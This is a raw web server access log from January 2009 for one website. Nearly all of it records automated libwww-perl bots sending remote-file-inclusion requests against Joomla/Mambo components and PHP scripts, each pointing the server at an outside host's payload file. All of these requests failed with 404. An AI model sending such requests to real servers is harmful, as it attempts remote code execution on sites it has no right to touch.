91.186.21.200 - - [04/Jan/2009:16:02:21 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
91.186.21.200 - - [04/Jan/2009:16:02:21 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
91.186.21.200 - - [04/Jan/2009:16:02:22 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
91.186.21.200 - - [04/Jan/2009:16:02:23 -0800] "GET /logs/errors.php?error=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
91.186.21.200 - - [04/Jan/2009:16:02:24 -0800] "GET /errors.php?error=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
202.181.97.89 - - [04/Jan/2009:16:03:07 -0800] "GET /logs//index2.php?x=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
202.181.97.89 - - [04/Jan/2009:16:03:07 -0800] "GET /index2.php?x=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
4.181.77.146 - - [04/Jan/2009:16:03:10 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; SuperSpider/139; Windows 98; Win 9x 4.90)" "www.vspeaking.com"
65.39.182.49 - - [04/Jan/2009:16:04:03 -0800] "GET /!scanhttp://sujiantho.com/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
66.160.185.20 - - [04/Jan/2009:16:04:15 -0800] "GET /config/dbutil.bck.php?confdir=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
91.186.21.200 - - [04/Jan/2009:16:04:29 -0800] "GET /logs/access_080915.log//config/dbutil.bck.php?confdir=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
66.160.185.20 - - [04/Jan/2009:16:04:30 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
66.160.185.20 - - [04/Jan/2009:16:04:31 -0800] "GET /config/dbutil.bck.php?confdir=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
84.21.71.133 - - [04/Jan/2009:16:06:02 -0800] "GET /logs/access_081208.log/errors.php?error=http://www.soloencostarica.com/scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
84.21.71.133 - - [04/Jan/2009:16:06:02 -0800] "GET /errors.php?error=http://www.soloencostarica.com/scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
84.21.71.133 - - [04/Jan/2009:16:06:02 -0800] "GET /logs/errors.php?error=http://www.soloencostarica.com/scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.74.151.146 - - [04/Jan/2009:16:08:10 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
80.74.151.146 - - [04/Jan/2009:16:08:10 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
84.21.71.133 - - [04/Jan/2009:16:08:22 -0800] "GET /logs/access_081208.log/errors.php?error=http://www.soloencostarica.com/scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
84.21.71.133 - - [04/Jan/2009:16:08:23 -0800] "GET /errors.php?error=http://www.soloencostarica.com/scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
84.21.71.133 - - [04/Jan/2009:16:08:23 -0800] "GET /logs/errors.php?error=http://www.soloencostarica.com/scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
61.19.42.210 - - [04/Jan/2009:16:08:39 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
61.19.42.210 - - [04/Jan/2009:16:08:40 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.241.170.247 - - [04/Jan/2009:16:08:55 -0800] "GET /include/html/nettools.popup.php?DIR=http://www.syforest.com/appserv/AUTHORS.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.241.170.247 - - [04/Jan/2009:16:08:55 -0800] "GET /logs//include/html/nettools.popup.php?DIR=http://www.syforest.com/appserv/AUTHORS.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
65.98.75.107 - - [04/Jan/2009:16:10:22 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
65.98.75.107 - - [04/Jan/2009:16:10:22 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.7.194.31 - - [04/Jan/2009:16:10:51 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
66.7.194.31 - - [04/Jan/2009:16:10:51 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
65.98.75.107 - - [04/Jan/2009:16:11:55 -0800] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.67.25.19 - - [04/Jan/2009:16:13:07 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
84.21.71.133 - - [04/Jan/2009:16:13:34 -0800] "GET /logs/access.log/errors.php?error=http://www.soloencostarica.com/scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
84.21.71.133 - - [04/Jan/2009:16:13:36 -0800] "GET /logs/access.log/errors.php?error=http://www.soloencostarica.com/scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.7.194.31 - - [04/Jan/2009:16:13:45 -0800] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
65.98.75.107 - - [04/Jan/2009:16:14:29 -0800] "GET /logs/access.log%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
221.143.46.163 - - [04/Jan/2009:16:14:41 -0800] "GET /logs/access_080922.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
221.143.46.163 - - [04/Jan/2009:16:14:41 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
221.143.46.163 - - [04/Jan/2009:16:14:42 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
66.160.185.20 - - [04/Jan/2009:16:15:03 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
80.67.25.19 - - [04/Jan/2009:16:16:51 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.25.19 - - [04/Jan/2009:16:16:51 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.25.19 - - [04/Jan/2009:16:16:51 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
84.21.71.133 - - [04/Jan/2009:16:17:17 -0800] "GET /logs/access_081020.log/errors.php?error=http://www.soloencostarica.com/scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
84.21.71.133 - - [04/Jan/2009:16:17:17 -0800] "GET /logs/access_081020.log/errors.php?error=http://www.soloencostarica.com/scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
221.143.46.163 - - [04/Jan/2009:16:17:29 -0800] "GET /logs/access_080929.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
66.7.194.31 - - [04/Jan/2009:16:17:44 -0800] "GET /logs/access.log%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
38.99.44.104 - - [04/Jan/2009:16:19:12 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.vspeaking.com"
4.181.77.146 - - [04/Jan/2009:16:19:22 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; SuperSpider/139; Windows 98; Win 9x 4.90)" "www.vspeaking.com"
85.214.53.78 - - [04/Jan/2009:16:20:08 -0800] "GET /logs/access.log///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
85.214.53.78 - - [04/Jan/2009:16:20:08 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
85.214.53.78 - - [04/Jan/2009:16:20:09 -0800] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:16:20:18 -0800] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:16:20:18 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
80.67.25.19 - - [04/Jan/2009:16:21:46 -0800] "GET /logs/access_081208.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.241.170.247 - - [04/Jan/2009:16:22:31 -0800] "GET /logs/access.log//include/html/nettools.popup.php?DIR=http://www.syforest.com/appserv/AUTHORS.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
212.95.39.220 - - [04/Jan/2009:16:23:46 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
212.95.39.220 - - [04/Jan/2009:16:23:46 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
222.237.76.32 - - [04/Jan/2009:16:26:00 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
222.237.76.32 - - [04/Jan/2009:16:26:01 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
69.73.129.216 - - [04/Jan/2009:16:26:18 -0800] "GET /logs//components/errors.php?error=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
69.73.129.216 - - [04/Jan/2009:16:26:18 -0800] "GET /components/errors.php?error=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
89.36.39.203 - - [04/Jan/2009:16:27:08 -0800] "GET /logs/access.log///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
89.36.39.203 - - [04/Jan/2009:16:27:11 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
89.36.39.203 - - [04/Jan/2009:16:27:14 -0800] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
85.214.53.78 - - [04/Jan/2009:16:27:55 -0800] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
85.214.53.78 - - [04/Jan/2009:16:27:55 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
72.29.93.130 - - [04/Jan/2009:16:28:49 -0800] "GET /logs/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.tradeadvantage.com/images/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
72.29.93.130 - - [04/Jan/2009:16:28:49 -0800] "GET /administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.tradeadvantage.com/images/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:16:30:04 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
61.19.42.210 - - [04/Jan/2009:16:31:00 -0800] "GET /logs/access_081020.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
61.19.42.210 - - [04/Jan/2009:16:31:01 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
61.19.42.210 - - [04/Jan/2009:16:31:02 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
61.19.42.210 - - [04/Jan/2009:16:31:57 -0800] "GET /logs/access_080929.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
217.115.154.55 - - [04/Jan/2009:16:32:42 -0800] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.casted.ru/bodo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
217.115.154.55 - - [04/Jan/2009:16:32:42 -0800] "GET /path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.casted.ru/bodo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
211.194.5.172 - - [04/Jan/2009:16:32:57 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.194.5.172 - - [04/Jan/2009:16:32:58 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
80.67.25.19 - - [04/Jan/2009:16:34:28 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.25.19 - - [04/Jan/2009:16:34:58 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.25.19 - - [04/Jan/2009:16:34:58 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
65.39.182.49 - - [04/Jan/2009:16:38:09 -0800] "GET /logs//appserv/main.php?appserv_root=http://sujiantho.com/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
65.39.182.49 - - [04/Jan/2009:16:38:09 -0800] "GET /appserv/main.php?appserv_root=http://sujiantho.com/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
221.143.42.108 - - [04/Jan/2009:16:39:33 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
221.143.42.108 - - [04/Jan/2009:16:39:34 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
85.214.53.78 - - [04/Jan/2009:16:41:08 -0800] "GET /logs///components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
85.214.53.78 - - [04/Jan/2009:16:41:08 -0800] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
78.111.80.24 - - [04/Jan/2009:16:41:49 -0800] "GET /logs/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.tradeadvantage.com/images/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
85.214.53.78 - - [04/Jan/2009:16:41:49 -0800] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
85.214.53.78 - - [04/Jan/2009:16:41:49 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
78.111.80.24 - - [04/Jan/2009:16:41:51 -0800] "GET /administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.tradeadvantage.com/images/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:16:41:56 -0800] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
77.221.130.2 - - [04/Jan/2009:16:42:39 -0800] "GET /logs/access_081208.log/akocomments.php?mosConfig_absolute_path=http://desirdesign.com/nimth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
72.29.93.130 - - [04/Jan/2009:16:42:39 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tradeadvantage.com/images/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
72.29.93.130 - - [04/Jan/2009:16:42:39 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tradeadvantage.com/images/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
77.221.130.2 - - [04/Jan/2009:16:42:40 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://desirdesign.com/nimth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.2 - - [04/Jan/2009:16:42:40 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://desirdesign.com/nimth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
83.222.23.200 - - [04/Jan/2009:16:45:54 -0800] "GET //config.php?path_to_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.2 - - [04/Jan/2009:16:45:55 -0800] "GET /logs/access_081020.log/akocomments.php?mosConfig_absolute_path=http://desirdesign.com/nimth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:16:47:51 -0800] "GET /logs/access.log///components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:16:47:51 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:16:47:51 -0800] "GET /logs///components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
85.204.231.202 - - [04/Jan/2009:16:48:02 -0800] "GET /logs/access.log///components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
85.204.231.202 - - [04/Jan/2009:16:48:05 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:16:48:06 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
85.204.231.202 - - [04/Jan/2009:16:48:09 -0800] "GET /logs///components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
66.7.216.240 - - [04/Jan/2009:16:48:20 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:16:49:45 -0800] "GET /logs/access.log///components/com_facileforms/facileforms.frame.php?ff_compath=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:16:49:45 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:16:49:45 -0800] "GET /logs///components/com_facileforms/facileforms.frame.php?ff_compath=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
83.222.23.200 - - [04/Jan/2009:16:50:19 -0800] "GET /logs/access_081208.log///config.php?path_to_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
83.222.23.200 - - [04/Jan/2009:16:50:19 -0800] "GET //config.php?path_to_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
83.222.23.200 - - [04/Jan/2009:16:50:20 -0800] "GET /logs///config.php?path_to_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.85.45.146 - - [04/Jan/2009:16:50:39 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
41.250.251.52 - - [04/Jan/2009:16:52:17 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
203.34.37.16 - - [04/Jan/2009:16:52:19 -0800] "GET /errors.php?error=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
